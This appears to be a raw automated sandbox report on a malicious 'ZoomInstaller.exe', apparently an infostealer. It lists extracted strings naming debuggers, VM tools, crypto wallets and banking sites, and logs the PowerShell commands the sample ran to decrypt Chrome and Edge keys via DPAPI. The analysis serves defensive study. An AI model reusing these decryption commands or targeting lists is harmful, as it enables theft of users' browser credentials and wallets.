    Source: ZoomInstaller.exeBinary or memory string: RUNTIME: SP=ABI MISMATCHWRONG TIMERSINVALID SLOTHOST IS DOWNILLEGAL SEEKGETLENGTHSIDGETLASTERRORGETSTDHANDLEGETTEMPPATHWLOADLIBRARYWREADCONSOLEWSETENDOFFILETRANSMITFILEGETADDRINFOWADVAPI32.DLLIPHLPAPI.DLLKERNEL32.DLLNETAPI32.DLL152587890625762939453125OPENSERVICEWREVERTTOSELFCREATEEVENTWGETCONSOLECPUNLOCKFILEEXVIRTUALQUERY HAS NO NAME HAS NO TYPEREFLECT.COPYCOMCTL32.DLLCOMDLG32.DLLCHOOSECOLORWCREATEBITMAPDELETEOBJECTEXTCREATEPENGETTEXTCOLORSELECTOBJECTSETTEXTCOLORGRADIENTFILLGLOBALUNLOCKLOADRESOURCELOCKRESOURCESETLASTERROROLEAUT32.DLLSYSSTRINGLENOPENGL32.DLLPDHOPENQUERYEXTRACTICONWENABLEWINDOWGETCURSORPOSPEEKMESSAGEWPOSTMESSAGEWREDRAWWINDOWSENDMESSAGEWSETCURSORPOSSETWINDOWPOSUPDATEWINDOWWINDOWFROMDCWINSPOOL.DRVRANDAUTOSEEDMIME-VERSIONX-IMFORWARDSX-POWERED-BYCONTENT TYPERCODESUCCESSRCODEREFUSEDNOT POLLABLETLSUNSAFEEKMCLOSE NOTIFYREMOTE ERRORC HS TRAFFICS HS TRAFFICC AP TRAFFICS AP TRAFFIC (SENSITIVE)GOTYPESALIASCFGMGR32.DLLSETUPAPI.DLLWINTRUST.DLLWTSAPI32.DLLREPORTEVENTWCREATEMUTEXWGETCOMMSTATEGETPROCESSIDRELEASEMUTEXRESUMETHREADSETCOMMBREAKSETCOMMSTATESETERRORMODESETSTDHANDLETHREAD32NEXTVIRTUALALLOCNTCREATEFILECOCREATEGUIDECDSA-SHA256ECDSA-SHA384ECDSA-SHA512CALLER ERRORSERIALNUMBERAVX5124FMAPSAVX512BITALG88.132.231.7152.251.116.35194.154.78.6920.99.160.173195.74.76.22234.105.183.6892.211.55.19979.104.209.3334.145.89.174109.74.154.90195.239.51.59192.40.57.23464.124.12.16234.142.74.220109.74.154.9134.105.72.241109.74.154.92213.33.142.5093.216.75.209192.87.28.10334.85.253.17023.128.248.4635.229.69.22734.141.245.2534.85.243.24187.166.50.21334.145.195.5835.192.93.10784.147.54.113W0FJUOVMCCP5AMITMPROXY.EXEWIRESHARK.EXEWIRESHARK.EXEPRL_TOOLS.EXEFILEZILLA.EXEENCRYPTED_KEYGUEST PROFILEBRAVE DEFAULTOPERA DEFAULTBLISK DEFAULTAUTHENTICATORHARMONYWALLET_BUSY_TIMEOUT_FOREIGN_KEYS_JOURNAL_MODE_LOCKING_MODEAUTH_USER_ADDLAME 
REFERRALSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAUTHORIZATIONCACHE-CONTROLLAST-MODIFIEDACCEPT-RANGESIF-NONE-MATCH[FRAMEHEADER INVALID BASE ACCEPT-RANGESAUTHORIZATIONCACHE-CONTROLCONTENT-RANGEIF-NONE-MATCHLAST-MODIFIEDFQDN TOO LONGSOCKS CONNECTRESET CONTENTLOOP DETECTEDFIELD NAME %Q IN HOST NAMEFINDFIRSTFILEWAKEABLESLEEPPROFMEMACTIVEPROFMEMFUTURETRACESTACKTABEXECRINTERNALTESTRINTERNALGC SWEEP WAITOUT OF MEMORY IS NIL, NOT VALUE METHOD BAD MAP STATE SPAN.BASE()=BAD FLUSHGEN , NOT POINTER != SWEEPGEN MB GLOBALS, WORK.NPROC= WORK.NWAIT= NSTACKROOTS= FLUSHEDWORK DOUBLE UNLOCK S.SPANCLASS= MB) WORKERS=MIN TOO LARGE-BYTE BLOCK (RUNTIME: VAL=RUNTIME: SEQ=FATAL ERROR: IDLETHREADS= SYSCALLTICK=LOAD64 FAILEDXADD64 FAILEDXCHG64 FAILEDNIL STACKBASE}
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477 (8 identical entries collapsed)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2950
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2340
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2846
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1102
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3800
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 859
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2678
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 870
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed (2 identical entries collapsed)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477 (8 identical entries collapsed)
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
    Source: ZoomInstaller.exeBinary or memory string: sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=level 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameparsing time out of range is too largenot availabledalTLDpSugct?3814697265625GetTempPath2WModule32NextWRtlGetVersionRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDestroyWindowDrawFocusRectGetClassNameWGetClientRectGetMenuItemIDGetScrollInfoGetSystemMenuGetWindowRectOpenClipboardSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWname too longtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMgzip, deflategocacheverifyinstallgoroothtml/templateRegDeleteKeyWDeleteServiceStartServiceWGetDriveTypeWThread32FirstWaitCommEventRtlInitStringEnumProcessesExitWindowsExtimeEndPeriodWTSFreeMemoryinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressshared_secretempty integerunsupported: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228tVaUeNrRraoKwaVMware SVGA 3Dvmwareuser.exexenservice.exevmwaretray.exeChrome DefaultYandex DefaultCocCoc Defaultis a directory_secure_deleteunexpected EOFinternal errorgetprotobynameunknown mode: Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofunknown error unknown code: Not AcceptableComputerNameEx
    Source: webdata.db.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
    Source: webdata.db.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
    Source: webdata.db.0.drBinary or memory string: discord.comVMware20,11696487552f
    Source: webdata.db.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
    Source: webdata.db.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
    Source: ZoomInstaller.exeBinary or memory string: SYSTEMROOT=assistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailunspecifiedcgocall nil s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCloseHandleCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32.dllshell32.dlluserenv.dlltime: file 30517578125ProcessPrngMoveFileExWNetShareAddNetShareDelbad argSizemethodargs(reflect.Set.WithCancel.WithValue(PrintDlgExWmsimg32.dllSwapBuffersgdiplus.dllGlobalAllocDestroyIconDestroyMenuDrawMenuBarDrawTextExWFindWindowWGetAncestorGetCaretPosGetIconInfoGetKeyStateGetMenuInfoGetMessageWGetSysColorLoadCursorWLoadStringWMessageBeepMessageBoxWSetMenuInfouxtheme.dllIsAppThemedIn-Reply-ToReturn-PathClassHESIODauthoritiesadditionalstls10servertls: alert(local errorc e traffictraffic updApplicationHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/x509archive/zipSHA-512/224SHA-512/256BLAKE2s-256BLAKE2b-256BLAKE2b-384BLAKE2b-512sechost.dllversion.dllGetFileTimeSetCommMaskVirtualFreeNetUserEnumCoGetObjectEnumWindowsToUnicodeExinvalid oidpsk_id_hashavx512vnniwavx512vbmi284.147.62.1295.25.204.9092.211.52.6234.138.96.2334.83.46.13035.237.47.12195.239.51.3AppOnFly-VPSPeter WilsonFX7767MOR6Q6RDhJ0CNFevzX8Nl0ColNQ5bqPqONjHVwexsSmitmdump.exeInsomnia.exeKsDumper.exevmacthlp.exevboxtray.exevmtoolsd.exeksdumper.exepestudio.exeTelegram.exemot_de_passeidentifiantsEdge DefaultBinanceChainGuardaWalletJaxxxLibertyTerraStationMartianAptosBitAppWalletAtomicWalletSaturnWalletTempleWalletwith name 
%q_auto_vacuum_synchronoussqlite_cryptauthenticateauth_enabledshort bufferinvalid baseContent-Typemultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowcan't happentransmitfilehttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2out of range100-continuerecv_goaway_Multi-StatusNot ModifiedUnauthorizedI'm a teapotNot Extendedproxyconnectexit status sweepWaiterstraceStringsspanSetSpinemspanSpecialtraceTypeTabgcBitsArenasmheapSpecialgcpacertraceharddecommitmadvdontneeddumping heapchan receivelfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (
Source: webdata.db.0.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0002AA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string:
Source: webdata.db.0.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: ZoomInstaller.exe, 00000000.00000002.2807697262.000002A254EEB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: webdata.db.0.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: webdata.db.0.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: webdata.db.0.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: webdata.db.0.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
    Source: ZoomInstaller.exeBinary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptdnsapi.dllws2_32.dll%!Weekday(short read12207031256103515625ParseFloatLockFileExWSASocketWcomplex128t.Kind == CombineRgnGetBkColorGetObjectWSetBkColorStretchBltAlphaBlendGlobalFreeGlobalLockDragFinishBeginPaintCreateMenuDeleteMenuDrawIconExGetDlgItemGetSubMenuLoadImageWMoveWindowRemoveMenuSetCaptureShowWindowContent-IdMessage-IdParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: res binderres masterresumptionexp masterHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsRIPEMD-160dwmapi.dllIsValidSidLocalAllocOpenEventWOpenMutexWOpenThreadPulseEventResetEventSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27fv-az269-80ARCHIBALDPCrunneradminaAYRAp7xfuowatcher.exemitmweb.exeCharles.exePostman.exeFiddler.exeOllyDbg.exefiddler.exeregedit.exetaskmgr.exevmusrvc.exedf5serv.exeqemu-ga.exeollydbg.exediscord.exeuser_data#2user_data#3user_data#4user_data#5identifiantYoroiWalletKardiaChainNiftyWalletBraveWalletEqualWalletGuildWalletMarshalJSONMarshalTextunreachable_auth_crypt_query_only_cache_sizeshort writesubmissionsnil contexti/o timeouthttp2serverhttp2clientENABLE_PUSHEND_HEADERS/index.html ErrCode=%v, settings:retry-afterTTL expiredEarly HintsBad RequestBad Gateway/dev/stdout/dev/stderrOpenProcessGetFileType bytes ...
Source: webdata.db.0.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: webdata.db.0.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: webdata.db.0.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: webdata.db.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: webdata.db.0.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: webdata.db.0.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: webdata.db.0.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: webdata.db.0.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: webdata.db.0.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: webdata.db.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: ZoomInstaller.exe | Binary or memory string: Handshakemath/randwinmm.dllPurgeCommSetupComminfo_hashQ9IATRKPRHQarZhrdBpjd1bnJkfVlHPxmdUOpVyxx64dbg.exex96dbg.exevmsrvc.exex32dbg.exeprl_cc.exechrome.exemsedge.exemotdepassepassphrasesauvegardeMathWalletEVERWalletPetraAptosFewchaMovePaliWalletMetamask_EMetaMask_O for type user32.dll2006-01-02_auth_user_auth_pass_auth_saltimpossible
Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0002AA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string:
    Source: ZoomInstaller.exeBinary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFilePointerNetUserGetInfoGetUserNameExWTranslateNameW procedure in winapi error #: extra text: invalid syntax1907348632812595367431640625OpenSCManagerWModule32FirstWunsafe.Pointer on zero Valueunknown method.WithoutCancel.WithDeadline(RegSetValueExWLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWSizeofResourceCoInitializeExCoUninitializeSysAllocStringwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeAccept-CharsetDkim-SignatureRCodeNameErrorResourceHeaderunreachable: bad record MACneed more dataREQUEST_METHODmime/multipartControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeVirtualProtectVirtualQueryExGetShellWindowVerQueryValueWdata truncated169.150.197.118212.119.227.165109.145.173.169212.119.227.151195.181.175.105193.225.193.201212.119.227.167BEE7370C-8C0C-4DESKTOP-Z7LUJHJDESKTOP-0HHYPKQDESKTOP-TUAHF5IDESKTOP-NAKFFMTWIN-5E07COS9ALRB30F0242-1C6A-4DESKTOP-VRSQLAGDESKTOP-D019GDMDESKTOP-WI8CLETDESKTOP-B0T93D6DESKTOP-1PYKP29DESKTOP-1Y2433R6C4E733F-C2D9-4DESKTOP-WG3MYJSDESKTOP-7XC6GEZDESKTOP-5OV9S0OBinaryNinja.exevboxservice.exeUnknown versionVivaldi 
DefaultLiqualityWalletMaiarDeFiWalletAuthenticator_EzipinsecurepathGetMonitorInfoWBEGIN IMMEDIATEBEGIN EXCLUSIVEmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleallocmRInternalGC (fractional)write heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockruntime.Goschedmalloc deadlockruntime error: elem size wrong with GC prog
Source: webdata.db.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: webdata.db.0.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"Jump to behavior
